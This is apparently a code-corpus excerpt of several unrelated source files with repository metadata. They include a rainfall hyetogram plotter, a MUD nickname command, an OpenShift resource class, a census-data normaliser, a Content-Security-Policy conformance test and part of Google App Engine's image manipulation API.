self.calc_dP_t()
self.h = []
#Para quantidade par de blocos
if len(self.dP_t)%2 == 0:
#Lado esquerdo do hietograma
for i in list(range(1,len(self.dP_t),2)):
self.h.append(self.dP_t[i])
#Lado direito do hietograma
for i in list(range(len(self.dP_t)-2,1,-2)):
self.h.append(self.dP_t[i])
self.h.append(self.dP_t[0])
#Para quantidade ímpar de blocos
else:
#Lado esquerdo do hietograma
for i in list(range(0,len(self.dP_t),2)):
self.h.append(self.dP_t[i])
#Lado direito do hietograma
for i in list(range(len(self.dP_t)-2,0,-2)):
self.h.append(self.dP_t[i])
return self.h
def save_txt(self):
self.calc_h()
#Gravando o hietograma em txt
csvfile = str(self.td)+"min_"+str(self.T)+"anos.txt"
with open(csvfile, "w") as output:
writer = csv.writer(output, lineterminator='\n')
for i,val in enumerate(self.h):
writer.writerow([(i+1)*self.dt,val])
print("Arquivo txt salvo no mesmo diretório deste programa")
def export_df(self):
self.calc_h()
h_list = []
for i,val in enumerate(self.h):
h_list.append([(i+1)*self.dt,val])
df = pd.DataFrame(h_list,columns=['dt','intensity'])
return df
def plot_graph(self):
self.calc_h()
y_axis = self.h
x_axis = []
for i in list(range(self.dt,self.td+1,self.dt)):
x_axis.append(i)
fig = plt.figure()
ax = fig.add_subplot(111)
#ax.set_aspect(aspect=1)
plt.bar(x_axis, y_axis, align='center', color="blue", width=self.dt/2)
plt.text((self.td/2)+self.dt, self.dP_t[-2] + self.dt,f'td = {self.td} min, T = {self.T} anos')
plt.title("Distribuição da chuva")
plt.ylabel("Intensidade (mm/h)")
plt.xlabel('Tempo (min)')
plt.xticks(x_axis, rotation = 35)
plt.tick_params(axis = 'x', which = 'major', labelsize = 8)
return fig
def plot_save_graph(self):
self.calc_h()
y_axis = self.h
x_axis = []
for i in list(range(self.dt,self.td+1,self.dt)):
x_axis.append(i)
fig = plt.figure()
ax = fig.add_subplot(111)
#ax.set_aspect(aspect=1)
plt.bar(x_axis, y_axis, align='center', color="blue", width=self.dt/2)
plt.text((self.td/2)+self.dt, self.dP_t[-2] + self.dt,f'td = {self.td} min, T = {self.T} anos')
plt.title("Distribuição da chuva")
plt.ylabel("Intensidade (mm/h)")
plt.xlabel('Tempo (min)')
plt.xticks(x_axis, rotation = 35)
plt.tick_params(axis = 'x', which = 'major', labelsize = 8)
plt.savefig(str(self.td)+"min_"+str(self.T)+"anos")
plt.show()
print("Gráfico do hietograma salvo no mesmo diretório deste programa")
| 33.952381
| 105
| 0.536466
|
85350882785d007299f4136f498487078ac828f1
| 1,893
|
py
|
Python
|
src/commands/nickname.py
|
seisatsu/DennisMUD-ESP32
|
b63d4b914c5e8d0f9714042997c64919b20be842
|
[
"MIT"
] | 19
|
2018-10-02T03:58:46.000Z
|
2021-04-09T13:09:23.000Z
|
commands/nickname.py
|
seisatsu/Dennis
|
8f1892f21beba6b21b4f7b9ba3062296bb1dc4b9
|
[
"MIT"
] | 100
|
2018-09-22T22:54:35.000Z
|
2021-04-16T17:46:34.000Z
|
src/commands/nickname.py
|
seisatsu/DennisMUD-ESP32
|
b63d4b914c5e8d0f9714042997c64919b20be842
|
[
"MIT"
] | 1
|
2022-01-03T02:21:56.000Z
|
2022-01-03T02:21:56.000Z
|
#######################
# Dennis MUD #
# nickname.py #
# Copyright 2018-2020 #
# Michael D. Reiley #
#######################
# **********
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
# **********
NAME = "nickname"
CATEGORIES = ["users"]
USAGE = "nickname <username>"
DESCRIPTION = """Lookup the nickname of a user by their <username>.
You can also lookup a user's username by their nickname with the `realname` command.
Ex. `nickname seisatsu`"""
def COMMAND(console, args):
# Perform initial checks.
if not COMMON.check(NAME, console, args, argmin=1):
return False
# Make sure the named user exists.
targetuser = COMMON.check_user(NAME, console, args[0].lower())
if not targetuser:
return False
# Show the user's nickname.
console.msg("{0}: {1}".format(targetuser["name"], targetuser["nick"]))
return True
| 36.403846
| 84
| 0.699419
|
07f83f42e19aea0b4cb81574380f9f98aec136eb
| 236
|
py
|
Python
|
ocp_resources/installplan.py
|
kbidarkar/openshift-python-wrapper
|
3cd4d6d3b71c82ff87f032a51510d9c9d207f6cb
|
[
"Apache-2.0"
] | 9
|
2021-07-05T18:35:55.000Z
|
2021-12-31T03:09:39.000Z
|
ocp_resources/installplan.py
|
kbidarkar/openshift-python-wrapper
|
3cd4d6d3b71c82ff87f032a51510d9c9d207f6cb
|
[
"Apache-2.0"
] | 418
|
2021-07-04T13:12:09.000Z
|
2022-03-30T08:37:45.000Z
|
ocp_resources/installplan.py
|
kbidarkar/openshift-python-wrapper
|
3cd4d6d3b71c82ff87f032a51510d9c9d207f6cb
|
[
"Apache-2.0"
] | 28
|
2021-07-04T12:48:18.000Z
|
2022-02-22T15:19:30.000Z
|
from ocp_resources.resource import NamespacedResource
class InstallPlan(NamespacedResource):
api_group = NamespacedResource.ApiGroup.OPERATORS_COREOS_COM
class Status(NamespacedResource.Status):
COMPLETE = "Complete"
| 26.222222
| 64
| 0.800847
|
6f505d4b3223a2c863981605191cb408e76fa36a
| 319
|
py
|
Python
|
showdata.py
|
Telemin/buddhabrot
|
a7dc257064fc303b11491bc49819b0782139f81b
|
[
"Unlicense"
] | null | null | null |
showdata.py
|
Telemin/buddhabrot
|
a7dc257064fc303b11491bc49819b0782139f81b
|
[
"Unlicense"
] | null | null | null |
showdata.py
|
Telemin/buddhabrot
|
a7dc257064fc303b11491bc49819b0782139f81b
|
[
"Unlicense"
] | 1
|
2019-02-25T23:51:50.000Z
|
2019-02-25T23:51:50.000Z
|
#!/usr/bin/env python3
import sys
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.colors as mc
def main():
data = np.loadtxt(sys.argv[1]) + 1
plt.hist(data.flatten())
plt.show()
plt.pcolor(data, cmap='gray')
plt.show()
return(0)
if __name__ == "__main__":
main()
| 15.95
| 38
| 0.639498
|
e82f1a96bcfb38e8f26dba57a3914d379ac12a42
| 4,176
|
py
|
Python
|
wts/tests/csp/csp_default-src_cross-origin_style.py
|
Acidburn0zzz/web-testing-service
|
1b46978e27a2e04f322d0f05f606ee96716642aa
|
[
"BSD-3-Clause"
] | null | null | null |
wts/tests/csp/csp_default-src_cross-origin_style.py
|
Acidburn0zzz/web-testing-service
|
1b46978e27a2e04f322d0f05f606ee96716642aa
|
[
"BSD-3-Clause"
] | null | null | null |
wts/tests/csp/csp_default-src_cross-origin_style.py
|
Acidburn0zzz/web-testing-service
|
1b46978e27a2e04f322d0f05f606ee96716642aa
|
[
"BSD-3-Clause"
] | null | null | null |
def main(request, response):
import simplejson as json
f = file('config.json')
source = f.read()
s = json.JSONDecoder().decode(source)
url1 = "http://" + s['host'] + ":" + str(s['ports']['http'][1])
url2 = "http://" + s['host'] + ":" + str(s['ports']['http'][0])
_CSP = "default-src " + url1 + ";script-src 'self' 'unsafe-inline'"
response.headers.set("Content-Security-Policy", _CSP)
response.headers.set("X-Content-Security-Policy", _CSP)
response.headers.set("X-WebKit-CSP", _CSP)
return """<!DOCTYPE html>
<!--
Copyright (c) 2013 Intel Corporation.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of works must retain the original copyright notice, this list
of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the original copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of Intel Corporation nor the names of its contributors
may be used to endorse or promote products derived from this work without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY INTEL CORPORATION "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL INTEL CORPORATION BE LIABLE FOR ANY DIRECT,
INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Authors:
Hao, Yunfei <yunfeix.hao@intel.com>
-->
<html>
<head>
<title>CSP Test: csp_default-src_cross-origin_style</title>
<link rel="author" title="Intel" href="http://www.intel.com"/>
<link rel="help" href="http://www.w3.org/TR/2012/CR-CSP-20121115/#default-src"/>
<meta name="flags" content=""/>
<meta charset="utf-8"/>
<script src="../resources/testharness.js"></script>
<script src="../resources/testharnessreport.js"></script>
<link rel="stylesheet" type="text/css" href='""" + url1 + """/tests/csp/support/w3c/canvas-index.css'/>
<link rel="stylesheet" type="text/css" href='""" + url2+ """/tests/csp/support/w3c/a-green.css'/>
<link rel="stylesheet" type="text/css" href="support/blue-100x100.css"/>
<style>
#test-green {
background-color: green;
}
</style>
</head>
<body>
<div id="log"></div>
<div id="test-blue"></div>
<h3>ext-css:""" + url1 + """/tests/csp/support/w3c/canvas-index.css</h3>
<div id="test-ext-a" class="a"></div>
<div id="test-green"></div>
<script>
test(function() {
var div = document.querySelector("h3");
var fix = getComputedStyle(div)["display"];
assert_equals(fix, "inline", "style setted incorrectly");
}, document.title + "_allowed");
test(function() {
var div = document.querySelector("#test-ext-a");
var fix = getComputedStyle(div)["color"];
assert_not_equals(fix, "rgb(0, 128, 0)", "style setted incorrectly");
}, document.title + "_blocked");
test(function() {
var div = document.querySelector("#test-blue");
var fix = getComputedStyle(div)["backgroundColor"];
assert_not_equals(fix, "rgb(0, 0, 255)", "style setted incorrectly");
}, document.title + "_blocked_int");
test(function() {
var div = document.querySelector("#test-green");
var fix = getComputedStyle(div)["backgroundColor"];
assert_not_equals(fix, "rgb(0, 128, 0)", "style setted incorrectly");
}, document.title + "_blocked_inline");
</script>
</body>
</html> """
| 43.957895
| 107
| 0.663314
|
9230a4a58aca6e866f8a29ca06cd77d3f928edfe
| 1,932
|
py
|
Python
|
all_data_norm.py
|
anikaanzum/NetworkDataAnalysis
|
13f008233ccb4e7c16a576a6e068daf9c14510d6
|
[
"MIT"
] | null | null | null |
all_data_norm.py
|
anikaanzum/NetworkDataAnalysis
|
13f008233ccb4e7c16a576a6e068daf9c14510d6
|
[
"MIT"
] | null | null | null |
all_data_norm.py
|
anikaanzum/NetworkDataAnalysis
|
13f008233ccb4e7c16a576a6e068daf9c14510d6
|
[
"MIT"
] | 1
|
2022-03-16T10:15:06.000Z
|
2022-03-16T10:15:06.000Z
|
import sys
import xlrd
import csv
import pandas
import os
import glob
import os.path
def read_csv(filename):
data=[]
with open(filename) as csvfile:
readCSV = csv.reader(csvfile)
for row in readCSV:
data.append(row)
#print(data)
header=data[0]
#print(header)
return header
def get_csv_info(path,Tag):
header=read_csv(path)
pop=[]
area=[]
for i in header:
if(Tag==i):
#print("Found")
with open(path) as f:
reader = csv.DictReader(f, delimiter=',')
for row in reader:
pop.append(row[Tag])
area.append(row['Areaname'])
return area,pop
my_path = os.path.abspath(os.path.dirname(__file__))
path = os.path.join(my_path, "CensusData/CountyData/")
extension = 'csv'
os.chdir(path)
result = [i for i in glob.glob('*.{}'.format(extension))]
file_name='PopulationNormalized2009.csv'
path = os.path.join(path, file_name)
Tag='NormalizedPopulation'
pop_area,pop_arr=get_csv_info(path,Tag)
path = os.path.join(my_path, "CensusData/CountyData/")
file_name='IncomeNormalized2009.csv'
path = os.path.join(path, file_name)
Tag='NormalizedIncome'
income_area,income_arr=get_csv_info(path,Tag)
path = os.path.join(my_path, "CensusData/CountyData/")
file_name='EducationNormalized2009.csv'
path = os.path.join(path, file_name)
Tag='NormalizedEducation'
edu_area,edu_arr=get_csv_info(path,Tag)
data=[['area','pop_norm','income_norm','edu_norm']]
for i in range(len(pop_area)):
incomeTemp=-1
eduTemp=-1
for j in range(len(income_area)):
if(income_area[j]==pop_area[i]):
incomeTemp=income_arr[j]
break
for j in range(len(edu_area)):
if(edu_area[j]==pop_area[i]):
eduTemp=edu_arr[j]
break
if(incomeTemp!=-1 and eduTemp!=-1):
data.append([pop_area[i],pop_arr[i],incomeTemp,eduTemp])
with open('../CountyData/NormalizedData.csv', 'w') as csvFile:
writer = csv.writer(csvFile)
writer.writerows(data)
| 20.125
| 62
| 0.693064
|
818b395b7b55a334449416eeaca5db9b3ca51cb5
| 34,606
|
py
|
Python
|
google/appengine/api/images/__init__.py
|
qsnake/google_appengine
|
6efcc6e4dd38fe2d2c210b57d3444c26b428af1f
|
[
"Apache-2.0"
] | 1
|
2015-10-28T21:28:29.000Z
|
2015-10-28T21:28:29.000Z
|
google/appengine/api/images/__init__.py
|
lann/python-google-appengine
|
2f1fe26e8429f491b034a5417f7c0c8f3a0247ab
|
[
"Apache-2.0"
] | null | null | null |
google/appengine/api/images/__init__.py
|
lann/python-google-appengine
|
2f1fe26e8429f491b034a5417f7c0c8f3a0247ab
|
[
"Apache-2.0"
] | 5
|
2016-05-26T18:35:17.000Z
|
2020-04-15T06:53:24.000Z
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Image manipulation API.
Classes defined in this module:
Image: class used to encapsulate image information and transformations for
that image.
The current manipulations that are available are resize, rotate,
horizontal_flip, vertical_flip, crop and im_feeling_lucky.
It should be noted that each transform can only be called once per image
per execute_transforms() call.
"""
import struct
from google.appengine.api import apiproxy_stub_map
from google.appengine.api.images import images_service_pb
from google.appengine.runtime import apiproxy_errors
JPEG = images_service_pb.OutputSettings.JPEG
PNG = images_service_pb.OutputSettings.PNG
OUTPUT_ENCODING_TYPES = frozenset([JPEG, PNG])
TOP_LEFT = images_service_pb.CompositeImageOptions.TOP_LEFT
TOP_CENTER = images_service_pb.CompositeImageOptions.TOP
TOP_RIGHT = images_service_pb.CompositeImageOptions.TOP_RIGHT
CENTER_LEFT = images_service_pb.CompositeImageOptions.LEFT
CENTER_CENTER = images_service_pb.CompositeImageOptions.CENTER
CENTER_RIGHT = images_service_pb.CompositeImageOptions.RIGHT
BOTTOM_LEFT = images_service_pb.CompositeImageOptions.BOTTOM_LEFT
BOTTOM_CENTER = images_service_pb.CompositeImageOptions.BOTTOM
BOTTOM_RIGHT = images_service_pb.CompositeImageOptions.BOTTOM_RIGHT
ANCHOR_TYPES = frozenset([TOP_LEFT, TOP_CENTER, TOP_RIGHT, CENTER_LEFT,
CENTER_CENTER, CENTER_RIGHT, BOTTOM_LEFT,
BOTTOM_CENTER, BOTTOM_RIGHT])
MAX_TRANSFORMS_PER_REQUEST = 10
MAX_COMPOSITES_PER_REQUEST = 16
class Error(Exception):
"""Base error class for this module."""
class TransformationError(Error):
"""Error while attempting to transform the image."""
class BadRequestError(Error):
"""The parameters given had something wrong with them."""
class NotImageError(Error):
"""The image data given is not recognizable as an image."""
class BadImageError(Error):
"""The image data given is corrupt."""
class LargeImageError(Error):
"""The image data given is too large to process."""
class InvalidBlobKeyError(Error):
"""The provided blob key was invalid."""
class BlobKeyRequiredError(Error):
"""A blobkey is required for this operation."""
class UnsupportedSizeError(Error):
"""Specified size is not supported by requested operation."""
class Image(object):
"""Image object to manipulate."""
def __init__(self, image_data=None, blob_key=None):
"""Constructor.
Args:
image_data: str, image data in string form.
blob_key: str, image data as a blobstore blob key.
Raises:
NotImageError if the given data is empty.
"""
if not image_data and not blob_key:
raise NotImageError("Empty image data.")
if image_data and blob_key:
raise NotImageError("Can only take one image or blob key.")
self._image_data = image_data
self._blob_key = blob_key
self._transforms = []
self._width = None
self._height = None
def _check_transform_limits(self):
"""Ensure some simple limits on the number of transforms allowed.
Raises:
BadRequestError if MAX_TRANSFORMS_PER_REQUEST transforms have already been
requested for this image
"""
if len(self._transforms) >= MAX_TRANSFORMS_PER_REQUEST:
raise BadRequestError("%d transforms have already been requested on this "
"image." % MAX_TRANSFORMS_PER_REQUEST)
def _update_dimensions(self):
"""Updates the width and height fields of the image.
Raises:
NotImageError if the image data is not an image.
BadImageError if the image data is corrupt.
"""
if not self._image_data:
raise NotImageError("Dimensions unavailable for blob key input")
size = len(self._image_data)
if size >= 6 and self._image_data.startswith("GIF"):
self._update_gif_dimensions()
elif size >= 8 and self._image_data.startswith("\x89PNG\x0D\x0A\x1A\x0A"):
self._update_png_dimensions()
elif size >= 2 and self._image_data.startswith("\xff\xD8"):
self._update_jpeg_dimensions()
elif (size >= 8 and (self._image_data.startswith("II\x2a\x00") or
self._image_data.startswith("MM\x00\x2a"))):
self._update_tiff_dimensions()
elif size >= 2 and self._image_data.startswith("BM"):
self._update_bmp_dimensions()
elif size >= 4 and self._image_data.startswith("\x00\x00\x01\x00"):
self._update_ico_dimensions()
else:
raise NotImageError("Unrecognized image format")
def _update_gif_dimensions(self):
"""Updates the width and height fields of the gif image.
Raises:
BadImageError if the image string is not a valid gif image.
"""
size = len(self._image_data)
if size >= 10:
self._width, self._height = struct.unpack("<HH", self._image_data[6:10])
else:
raise BadImageError("Corrupt GIF format")
def _update_png_dimensions(self):
"""Updates the width and height fields of the png image.
Raises:
BadImageError if the image string is not a valid png image.
"""
size = len(self._image_data)
if size >= 24 and self._image_data[12:16] == "IHDR":
self._width, self._height = struct.unpack(">II", self._image_data[16:24])
else:
raise BadImageError("Corrupt PNG format")
def _update_jpeg_dimensions(self):
"""Updates the width and height fields of the jpeg image.
Raises:
BadImageError if the image string is not a valid jpeg image.
"""
size = len(self._image_data)
offset = 2
while offset < size:
while offset < size and ord(self._image_data[offset]) != 0xFF:
offset += 1
while offset < size and ord(self._image_data[offset]) == 0xFF:
offset += 1
if (offset < size and ord(self._image_data[offset]) & 0xF0 == 0xC0 and
ord(self._image_data[offset]) != 0xC4):
offset += 4
if offset + 4 <= size:
self._height, self._width = struct.unpack(
">HH",
self._image_data[offset:offset + 4])
break
else:
raise BadImageError("Corrupt JPEG format")
elif offset + 3 <= size:
offset += 1
offset += struct.unpack(">H", self._image_data[offset:offset + 2])[0]
else:
raise BadImageError("Corrupt JPEG format")
if self._height is None or self._width is None:
raise BadImageError("Corrupt JPEG format")
def _update_tiff_dimensions(self):
"""Updates the width and height fields of the tiff image.
Raises:
BadImageError if the image string is not a valid tiff image.
"""
size = len(self._image_data)
if self._image_data.startswith("II"):
endianness = "<"
else:
endianness = ">"
ifd_offset = struct.unpack(endianness + "I", self._image_data[4:8])[0]
if ifd_offset + 14 <= size:
ifd_size = struct.unpack(
endianness + "H",
self._image_data[ifd_offset:ifd_offset + 2])[0]
ifd_offset += 2
for unused_i in range(0, ifd_size):
if ifd_offset + 12 <= size:
tag = struct.unpack(
endianness + "H",
self._image_data[ifd_offset:ifd_offset + 2])[0]
if tag == 0x100 or tag == 0x101:
value_type = struct.unpack(
endianness + "H",
self._image_data[ifd_offset + 2:ifd_offset + 4])[0]
if value_type == 3:
format = endianness + "H"
end_offset = ifd_offset + 10
elif value_type == 4:
format = endianness + "I"
end_offset = ifd_offset + 12
else:
format = endianness + "B"
end_offset = ifd_offset + 9
if tag == 0x100:
self._width = struct.unpack(
format,
self._image_data[ifd_offset + 8:end_offset])[0]
if self._height is not None:
break
else:
self._height = struct.unpack(
format,
self._image_data[ifd_offset + 8:end_offset])[0]
if self._width is not None:
break
ifd_offset += 12
else:
raise BadImageError("Corrupt TIFF format")
if self._width is None or self._height is None:
raise BadImageError("Corrupt TIFF format")
def _update_bmp_dimensions(self):
"""Updates the width and height fields of the bmp image.
Raises:
BadImageError if the image string is not a valid bmp image.
"""
size = len(self._image_data)
if size >= 18:
header_length = struct.unpack("<I", self._image_data[14:18])[0]
if ((header_length == 40 or header_length == 108 or
header_length == 124 or header_length == 64) and size >= 26):
self._width, self._height = struct.unpack("<II",
self._image_data[18:26])
elif header_length == 12 and size >= 22:
self._width, self._height = struct.unpack("<HH",
self._image_data[18:22])
else:
raise BadImageError("Corrupt BMP format")
else:
raise BadImageError("Corrupt BMP format")
def _update_ico_dimensions(self):
"""Updates the width and height fields of the ico image.
Raises:
BadImageError if the image string is not a valid ico image.
"""
size = len(self._image_data)
if size >= 8:
self._width, self._height = struct.unpack("<BB", self._image_data[6:8])
if not self._width:
self._width = 256
if not self._height:
self._height = 256
else:
raise BadImageError("Corrupt ICO format")
def resize(self, width=0, height=0):
"""Resize the image maintaining the aspect ratio.
If both width and height are specified, the more restricting of the two
values will be used when resizing the photo. The maximum dimension allowed
for both width and height is 4000 pixels.
Args:
width: int, width (in pixels) to change the image width to.
height: int, height (in pixels) to change the image height to.
Raises:
TypeError when width or height is not either 'int' or 'long' types.
BadRequestError when there is something wrong with the given height or
width or if MAX_TRANSFORMS_PER_REQUEST transforms have already been
requested on this image.
"""
if (not isinstance(width, (int, long)) or
not isinstance(height, (int, long))):
raise TypeError("Width and height must be integers.")
if width < 0 or height < 0:
raise BadRequestError("Width and height must be >= 0.")
if not width and not height:
raise BadRequestError("At least one of width or height must be > 0.")
if width > 4000 or height > 4000:
raise BadRequestError("Both width and height must be <= 4000.")
self._check_transform_limits()
transform = images_service_pb.Transform()
transform.set_width(width)
transform.set_height(height)
self._transforms.append(transform)
def rotate(self, degrees):
"""Rotate an image a given number of degrees clockwise.
Args:
degrees: int, must be a multiple of 90.
Raises:
TypeError when degrees is not either 'int' or 'long' types.
BadRequestError when there is something wrong with the given degrees or
if MAX_TRANSFORMS_PER_REQUEST transforms have already been requested.
"""
if not isinstance(degrees, (int, long)):
raise TypeError("Degrees must be integers.")
if degrees % 90 != 0:
raise BadRequestError("degrees argument must be multiple of 90.")
degrees = degrees % 360
self._check_transform_limits()
transform = images_service_pb.Transform()
transform.set_rotate(degrees)
self._transforms.append(transform)
def horizontal_flip(self):
"""Flip the image horizontally.
Raises:
BadRequestError if MAX_TRANSFORMS_PER_REQUEST transforms have already been
requested on the image.
"""
self._check_transform_limits()
transform = images_service_pb.Transform()
transform.set_horizontal_flip(True)
self._transforms.append(transform)
def vertical_flip(self):
"""Flip the image vertically.
Raises:
BadRequestError if MAX_TRANSFORMS_PER_REQUEST transforms have already been
requested on the image.
"""
self._check_transform_limits()
transform = images_service_pb.Transform()
transform.set_vertical_flip(True)
self._transforms.append(transform)
def _validate_crop_arg(self, val, val_name):
"""Validate the given value of a Crop() method argument.
Args:
val: float, value of the argument.
val_name: str, name of the argument.
Raises:
TypeError if the args are not of type 'float'.
BadRequestError when there is something wrong with the given bounding box.
"""
if type(val) != float:
raise TypeError("arg '%s' must be of type 'float'." % val_name)
if not (0 <= val <= 1.0):
raise BadRequestError("arg '%s' must be between 0.0 and 1.0 "
"(inclusive)" % val_name)
def crop(self, left_x, top_y, right_x, bottom_y):
"""Crop the image.
The four arguments are the scaling numbers to describe the bounding box
which will crop the image. The upper left point of the bounding box will
be at (left_x*image_width, top_y*image_height) the lower right point will
be at (right_x*image_width, bottom_y*image_height).
Args:
left_x: float value between 0.0 and 1.0 (inclusive).
top_y: float value between 0.0 and 1.0 (inclusive).
right_x: float value between 0.0 and 1.0 (inclusive).
bottom_y: float value between 0.0 and 1.0 (inclusive).
Raises:
TypeError if the args are not of type 'float'.
BadRequestError when there is something wrong with the given bounding box
or if MAX_TRANSFORMS_PER_REQUEST transforms have already been requested
for this image.
"""
self._validate_crop_arg(left_x, "left_x")
self._validate_crop_arg(top_y, "top_y")
self._validate_crop_arg(right_x, "right_x")
self._validate_crop_arg(bottom_y, "bottom_y")
if left_x >= right_x:
raise BadRequestError("left_x must be less than right_x")
if top_y >= bottom_y:
raise BadRequestError("top_y must be less than bottom_y")
self._check_transform_limits()
transform = images_service_pb.Transform()
transform.set_crop_left_x(left_x)
transform.set_crop_top_y(top_y)
transform.set_crop_right_x(right_x)
transform.set_crop_bottom_y(bottom_y)
self._transforms.append(transform)
def im_feeling_lucky(self):
"""Automatically adjust image contrast and color levels.
This is similar to the "I'm Feeling Lucky" button in Picasa.
Raises:
BadRequestError if MAX_TRANSFORMS_PER_REQUEST transforms have already
been requested for this image.
"""
self._check_transform_limits()
transform = images_service_pb.Transform()
transform.set_autolevels(True)
self._transforms.append(transform)
def _set_imagedata(self, imagedata):
"""Fills in an ImageData PB from this Image instance.
Args:
imagedata: An ImageData PB instance
"""
if self._blob_key:
imagedata.set_content("")
imagedata.set_blob_key(self._blob_key)
else:
imagedata.set_content(self._image_data)
def execute_transforms(self, output_encoding=PNG, quality=None):
"""Perform transformations on given image.
Args:
output_encoding: A value from OUTPUT_ENCODING_TYPES.
quality: A value between 1 and 100 to specify the quality of the
encoding. This value is only used for JPEG quality control.
Returns:
str, image data after the transformations have been performed on it.
Raises:
BadRequestError when there is something wrong with the request
specifications.
NotImageError when the image data given is not an image.
BadImageError when the image data given is corrupt.
LargeImageError when the image data given is too large to process.
InvalidBlobKeyError when the blob key provided is invalid.
TransformtionError when something errors during image manipulation.
Error when something unknown, but bad, happens.
"""
if output_encoding not in OUTPUT_ENCODING_TYPES:
raise BadRequestError("Output encoding type not in recognized set "
"%s" % OUTPUT_ENCODING_TYPES)
if not self._transforms:
raise BadRequestError("Must specify at least one transformation.")
if quality is not None:
if not isinstance(quality, (int, long)):
raise TypeError("Quality must be an integer.")
if quality > 100 or quality < 1:
raise BadRequestError("Quality must be between 1 and 100.")
request = images_service_pb.ImagesTransformRequest()
response = images_service_pb.ImagesTransformResponse()
self._set_imagedata(request.mutable_image())
for transform in self._transforms:
request.add_transform().CopyFrom(transform)
request.mutable_output().set_mime_type(output_encoding)
if ((output_encoding == JPEG) and
(quality is not None)):
request.mutable_output().set_quality(quality)
try:
apiproxy_stub_map.MakeSyncCall("images",
"Transform",
request,
response)
except apiproxy_errors.ApplicationError, e:
if (e.application_error ==
images_service_pb.ImagesServiceError.BAD_TRANSFORM_DATA):
raise BadRequestError()
elif (e.application_error ==
images_service_pb.ImagesServiceError.NOT_IMAGE):
raise NotImageError()
elif (e.application_error ==
images_service_pb.ImagesServiceError.BAD_IMAGE_DATA):
raise BadImageError()
elif (e.application_error ==
images_service_pb.ImagesServiceError.IMAGE_TOO_LARGE):
raise LargeImageError()
elif (e.application_error ==
images_service_pb.ImagesServiceError.INVALID_BLOB_KEY):
raise InvalidBlobKeyError()
elif (e.application_error ==
images_service_pb.ImagesServiceError.UNSPECIFIED_ERROR):
raise TransformationError()
else:
raise Error()
self._image_data = response.image().content()
self._blob_key = None
self._transforms = []
self._width = None
self._height = None
return self._image_data
@property
def width(self):
"""Gets the width of the image."""
if self._width is None:
self._update_dimensions()
return self._width
@property
def height(self):
"""Gets the height of the image."""
if self._height is None:
self._update_dimensions()
return self._height
def histogram(self):
"""Calculates the histogram of the image.
Returns: 3 256-element lists containing the number of occurences of each
value of each color in the order RGB. As described at
http://en.wikipedia.org/wiki/Color_histogram for N = 256. i.e. the first
value of the first list contains the number of pixels with a red value of
0, the second the number with a red value of 1.
Raises:
NotImageError when the image data given is not an image.
BadImageError when the image data given is corrupt.
LargeImageError when the image data given is too large to process.
Error when something unknown, but bad, happens.
"""
request = images_service_pb.ImagesHistogramRequest()
response = images_service_pb.ImagesHistogramResponse()
self._set_imagedata(request.mutable_image())
try:
apiproxy_stub_map.MakeSyncCall("images",
"Histogram",
request,
response)
except apiproxy_errors.ApplicationError, e:
if (e.application_error ==
images_service_pb.ImagesServiceError.NOT_IMAGE):
raise NotImageError()
elif (e.application_error ==
images_service_pb.ImagesServiceError.BAD_IMAGE_DATA):
raise BadImageError()
elif (e.application_error ==
images_service_pb.ImagesServiceError.IMAGE_TOO_LARGE):
raise LargeImageError()
elif (e.application_error ==
images_service_pb.ImagesServiceError.INVALID_BLOB_KEY):
raise InvalidBlobKeyError()
else:
raise Error()
histogram = response.histogram()
return [histogram.red_list(),
histogram.green_list(),
histogram.blue_list()]
def resize(image_data, width=0, height=0, output_encoding=PNG):
"""Resize a given image file maintaining the aspect ratio.
If both width and height are specified, the more restricting of the two
values will be used when resizing the photo. The maximum dimension allowed
for both width and height is 4000 pixels.
Args:
image_data: str, source image data.
width: int, width (in pixels) to change the image width to.
height: int, height (in pixels) to change the image height to.
output_encoding: a value from OUTPUT_ENCODING_TYPES.
Raises:
TypeError when width or height not either 'int' or 'long' types.
BadRequestError when there is something wrong with the given height or
width.
Error when something went wrong with the call. See Image.ExecuteTransforms
for more details.
"""
image = Image(image_data)
image.resize(width, height)
